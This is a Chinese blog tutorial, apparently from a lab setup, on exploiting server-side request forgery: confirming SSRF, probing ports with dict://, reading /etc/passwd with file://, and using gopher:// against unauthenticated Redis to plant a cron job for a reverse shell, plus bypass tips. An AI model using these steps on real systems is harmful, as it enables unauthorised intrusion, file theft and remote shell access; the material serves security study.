利用ssrf上传文件到服务器,SSRF详细利用方式及getshell

最新推荐文章于 2024-06-22 12:53:35 发布
最新推荐文章于 2024-06-22 12:53:35 发布
阅读量876 收藏 1
点赞数

注:本文仅供学习参考

本文将分为三个部分讲解

0x01 ssrf本地远程及其他验证漏洞方式

0x02 ssrf利用redis未授权getshell

0x03 ssrf常见的绕过方式

0x01 ssrf本地及远程验证方式

重新复现一下 顺便复习一下curl和监听端口的命令

无回显的ssrf验证

本地开启apache服务

bVbEiaN

在存在ssrf处访问http://10.1.1.200(本机服务地址)

查看kali机器服务器日志信息:

tail -f /var/log/apache2/access.log

bVbEia6

bVbEia5

打开日志发现被访问了,确定存在ssrf漏洞

无回显还可以使用burp的collaborator来进行尝试或者dnslog

利用tcpdump测试:

Kali机器打开一个终端,使用tcpdump抓包:

#tcpdump -nne -i eth0 port 6666

-nne:不把端口和网络地址转换成名称,在输出行打印数据链路层的头部信息;

-i:监视指定网络接口的数据包。

bVbEibg

bVbEibr

可以看箭头处,成功由本地访问到,确定存在ssrf漏洞

通过dict协议获取服务器端口运行的服务

1.本地利用:本机机器中在终端输入:

curl -v 'dict://127.0.0.1:22'

curl:一种命令行工具,作用是发出网络请求,获取数据;

curl -v:显示HTTP通信的整个过程,包括端口连接和HTTP request头信息。

bVbEicv

可以看到ssh版本号为2.0 debian-6版本

2.远程利用:在存在ssrf地方输入

dict://127.0.0.1:22

bVbEicH

利用技巧:可以通过Burp爆破看对方开启了什么服务

通过file协议访问计算机中的任意文件

1.本地利用:在终端输入

curl -v 'file:///etc/passwd'

bVbEicV

2.远程利用:在存在ssrf地方输入

file:///etc/passwd

bVbEidj

sftp及tftp协议在SSRF中的作用

1.sftp代表SSH文件传输协议,通过sftp协议获取SSH相关信息:

Kali机器上输入:nc -lvp 1234

-l:监听入站信息;

-p:设置本地主机使用的通信端口;

-v:显示指令执行过程。

在存在SSRF处输入:sftp://10.1.1.200:1234,点击‘TEST IT’后查看响应信息:

bVbEidA

2.tftp即简单文件传输协议,允许客户端从远程主机获取文件:

Kali机器上输入:nc -lvup 6666

-u:使用UDP传输协议。

在SSRF处输入:tftp://10.1.1.200:6666

点击后查看响应信息:

bVbEidK

0x02ssrf利用redis未授权getshell

通过gopher协议攻击Redis,如果内网中的Redis存在未授权访问漏洞,当Redis服务以root权限运行时,利用gopher协议攻击内网中的Redis,通过写入定时任务可以实现反弹shell

1.首先开启centos下redis服务

# cd /usr/local/bin

# ./redis-server /root/redis-5.0.4/redis.conf

bVbEiKQ

2.在kali上开启redis服务

cd /usr/redis/

./redis-server

bVbEiLh

另外开启一个终端,测试启动:

./redis-cli ping

bVbEiLA

启动成功

4.在kali机器写一个redis反弹shell的bash脚本:

bVbEiPc

在Redis的第0个数据库中添加key为1,名为root的定时任务,value字段最后会多一个n是因为echo重定向最后会自带一个换行符,位置为CentOS机器的/var/spool/cron/,10.1.1.200为获取反弹shell的本地IP地址,666为反弹shell的监听端口,可随意设置。

5.Kali机器另外开启一个终端,使用socat进行端口转发,获取Redis攻击的TCP数据包:

# socat -v tcp-listen:2333,fork tcp-connect:127.0.0.1:6379

将本地的2333端口转发到Redis服务器的6379端口,访问本地的2333端口其实是访问Redis服务器的6379端口。

bVbEiR8

执行脚本

bash shell.sh 127.0.0.1 2333

获取到数据

bVbEiVM

6.先将socat获取的数据保存为socat.log文件,利用脚本将数据转换成适配于gopher协议的URL。

bVbEiSP

7.在kali上监听端口

nv -lvvp 666

bVbEiVV

8.攻击CentOS机器的Redis服务:

在SSRF处输入gopher://IP:端口/_payload:

gopher://127.0.0.1:6379/_转换的数据内容:

bVbEiW4

成功反弹shell

0x03 ssrf常见的绕过方式

IP地址转换进制

添加端口

利用短地址进行302跳转(如192.168.1.1.xip.ip会自动重定向到192.168.1.1)

利用句号

还有很多绕过方式

暂时总结到这里吧

校里蛙
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF学习(5)gopher协议上文件
m0_64417923的博客
05-14 676
题目:这次需要上一个文件到flag.php了.祝你好运 首先从目标机本地访问flag.php: url=http://127.0.0.1/flag.php 得到一个文件的界面,需要上一个Webshell。再查看源代码: /?url=file:///var/www/html/flag.php <?php ​ error_reporting(0); ​ if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ echo "...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
ssrf 过滤.php,SSRF详细利用方式getshell
weixin_33955394的博客
03-22 537
本文将分为三个部分讲解0x01 ssrf本地远程及其他验证漏洞方式0x02 ssrf利用redis未授权getshell0x03 ssrf常见的绕过方式0x01 ssrf本地及远程验证方式重新复现一下 顺便复习一下curl和监听端口的命令无回显的ssrf验证本地开启apache服务 在存在ssrf处访问http://10.1.1.200(本机服务地址)查看kali机器服务器日志信息:tail -...
一篇文章教你学会SSRF漏洞
最新发布
a770067334的博客
06-22 959
1.1w字文章,包括SSRF漏洞介绍、原理、攻击和利用方式SSRF利用的协议、常见的漏洞函数、可能出现漏洞的点、SSRF的危害、SSRF的防御、SSRF绕过bypass、SSRF的优势、SSRF漏洞绕过方法、常用常见限制及绕过方法、SSRF修复建议、漏洞演示、SSRF利用
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5236
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
ctfhub ssrf之上文件
L_2448570135的博客
03-13 521
CTFHUB之ssrf文件的题目内容,记录自己遇到的问题
SSRF防御机制及方法,具体绕过方法
白帽黑客八哥的博客
12-13 958
服务器端请求伪造(SSRF)攻击是一种网络安全威胁,其中攻击者迫使服务器执行对内部系统或外部系统的请求。防御SSRF攻击需要采用多种策略和技术。以下是一些有效的防御机制及方法,以及一些常见的绕过技巧。
CTFHub技能树笔记之SSRF:POST请求、文件
weixin_48799157的博客
04-03 8102
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF-Testing:SSRF服务器端请求伪造)测试资源
04-23
SSRF服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
Web渗透测试之SSRF攻击:绕过SSRF过滤器
vodkaDL的博客
03-09 2875
文章目录前言 前言
手把手带你用 SSRF 打穿内网
weixin_50464560的博客
05-13 2711
靶场拓扑设计首先来看下本次靶场的设计拓扑图: 先理清一下攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080,此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 本场景基本上覆盖了 SSRF 常见的攻击场景,实际上 SSRF 还可以攻击 FTP、Zabbix、Memcached 等应用,由于时间和精力有限,先挖个坑,以后有机会的话再补充完善这套 SSRF 攻击场景的。 x.x.x.x
2024届【校招】安全面试题和岗位总结(字节、百度、腾讯、美团等大厂(1)
2401_84302722的博客
05-16 854
从0x1F到0x26都来自于https://github.com/biggerduck/RedTeamNotes/blob/main/2022%E5%A4%A7%E5%8E%82%E9%9D%A2%E7%BB%8F.pdf 觉得写的很好就把一些比较多的整过来了,建议去下个pdf看前言部分,问题部分仅供参考。很奇葩的剧情,一面面试官面完告诉我有base北京base深圳问我是不是想要深圳的,我说是,结果过了一个多星期hr告诉我因为我一面面试官是北京的,然后我选了深圳,所以一面不作数,重新约了一面。
SSRF绕过IP限制方法总结
weixin_30575309的博客
09-04 1211
SSRF绕过IP限制方法总结 - Summary of SSRF methods for bypassing IP restrictions -https://www.cnblogs.com/iAmSoScArEd/p/11458850.html 一、SSRF简介 SSRF(Server-Side Request Forgery,服务器端请求伪造):通俗的来说就是我们可以伪造服务器...
SSRF漏洞分析与利用
3569
11-06 7665
http://www.91ri.org/17111.html 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 漏洞产生 以curl为例,漏洞代码为ssrf.php Default 1234567
ssrf 过滤.php,SSRF技巧之如何绕过filter_var( )
weixin_42478292的博客
03-22 414
0x00 前言前几天我读了两篇非常棒的论文:第一篇是发表在blackhat.com上的“A New Era of SSRF ”,讲述的是不同编程语言的SSRF问题;第二篇是由Positive Technology发表的一篇名为“PHP Wrapper” 的论文,它主要讲述的是如何以多种不同的方式使用PHP Wrapper来绕过过滤器以及受过滤的输入(您可以在结尾处找到这两个链接)。在本文中,我将深...
利用ssrf文件服务器,4.4. SSRF
weixin_34413579的博客
08-02 168
4.4.4. 过滤绕过¶4.4.4.1. 更改IP地址写法¶一些开发者会通过对过来的URL参数进行正则匹配的方式来过滤掉内网IP,如采用如下正则表达式:^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$^192\....
SSRF漏洞利用全解析:典型手法与实战案例
本篇文章以一种类似于SQL注入技巧总结的形式,全面探讨了SSRF漏洞的原理、常见攻击步骤、利用方式、特定环境下的漏洞利用示例以及一些规避策略。 首先,了解SSRF的基本概念是关键。SSRF通常涉及以下几个方面: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值